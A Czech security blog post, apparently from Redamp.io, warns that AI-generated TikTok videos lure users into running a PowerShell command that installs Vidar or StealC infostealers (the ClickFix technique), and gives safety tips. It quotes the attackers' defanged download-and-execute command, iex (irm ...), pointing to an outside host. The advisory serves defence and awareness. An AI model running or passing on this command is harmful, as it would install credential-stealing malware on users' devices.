TikTok jako nová platforma pro distribuci malwaru

TikTokMalware

Kyberzločinci využívají TikTok videa k tomu, aby nalákali uživatele k neúmyslnému stažení malwaru prostřednictvím sofistikovaného útoku.

Redamp.io | TikTok Malware

Fáze 1: Falešná instruktážní videa

V této kampani útočníci používají videa generovaná pomocí AI, aby slovně navedli uživatele k provádění škodlivých příkazů na jejich vlastních zařízeních.

Sociální inženýrství (nebo-li získání důvěry nebo manipulace uživatele) probíhá výhradně ve videu — na platformě samotné není hostován žádný škodlivý kód. Protože všechny pokyny jsou dodávány vizuálně a zvukově, tradiční bezpečnostní nástroje nemají co skenovat nebo blokovat. Tato metoda umožňuje útočníkům obejít konvenční detekční mechanismy a komplikuje snahy obránců identifikovat a zastavit tyto útoky.

Obrázek níže ilustruje TikTok profil spojený s útočníkem.

Redamp.io | TikTok Malware

Jedno z videí nabádá diváky k provedení PowerShell příkazu a získalo více než 20 000 lajků a 100 komentářů, což ukazuje silnou angažovanost a úroveň důvěry od uživatelů.

PowerShell je nástroj od Microsoftu, který umožňuje uživatelům automatizovat úkoly a spravovat nastavení systému pomocí příkazů příkazového řádku.

Screenshot níže ukazuje, jak populární a široce sledované video je, což naznačuje, že mnoho lidí mohlo následovat jeho radu.

Redamp.io | TikTok Malware

Video již není dostupné, ale kroky, které měl uživatel provést na svém Windows počítači, jsou následující:

  1. Podržte klávesu Windows a stiskněte R pro otevření dialogu Spustit.
  2. Do pole napište powershell a stiskněte OK. Redamp.io | TikTok Malware
  3. V okně PowerShell zadejte následující příkaz: iex (irm hxxps://allaivo[.]me/spotify)

Fáze 2: Infostealer a ClickFix

Poté, co uživatel provede výše uvedené kroky, se na pozadí spustí skript, který stáhne tzv. infostealer malware jako je "Vidar" nebo "StealC" na zařízení.

Infostealer je typ škodlivého softwaru navrženého k tajnému kradení citlivých informací, jako jsou hesla, údaje o kreditních kartách a osobní údaje z počítače oběti.

Jakmile je malware nasazen, "Vidar" může zachytit snímky obrazovky a krást hesla, informace o kreditních kartách, cookies, kryptoměnové peněženky, textové dokumenty a databáze 2FA autentizátorů. Podobně "StealC" shromažďuje širokou škálu citlivých dat z infikovaných zařízení tím, že cílí na řadu webových prohlížečů a kryptoměnových peněženek.

Tento koncept podvedení uživatele se nazývá ClickFix.

ClickFix je technika, kterou používají útočníci k prezentaci falešných chyb nebo ověřovacích kroků, například falešných CAPTCHA výzvev . Snaží se tak oklamat uživatele, aby aktivovali škodlivé skripty, které stahují a instalují malware na jejich zařízení.

Jak zůstat v bezpečí nejen na TikToku

  1. Nevkládejte neznámé odkazy do konzole příkazového řádku: Redamp.io | TikTok Malware
  2. Nespouštějte neznámé příkazy v konzoli příkazového řádku: Redamp.io | TikTok Malware
  3. Neklikejte na odkazy v komentářích, zprávách nebo profilech u neznámých nebo neověřených účtů — mohou vést ke stahování malwaru nebo phishingovým stránkám.
  4. Zůstaňte informováni! Čtěte náš blog  a sledujte oznámení v aplikaci o nejnovějších hrozbách, které pro vás monitorujeme.

Zdroje: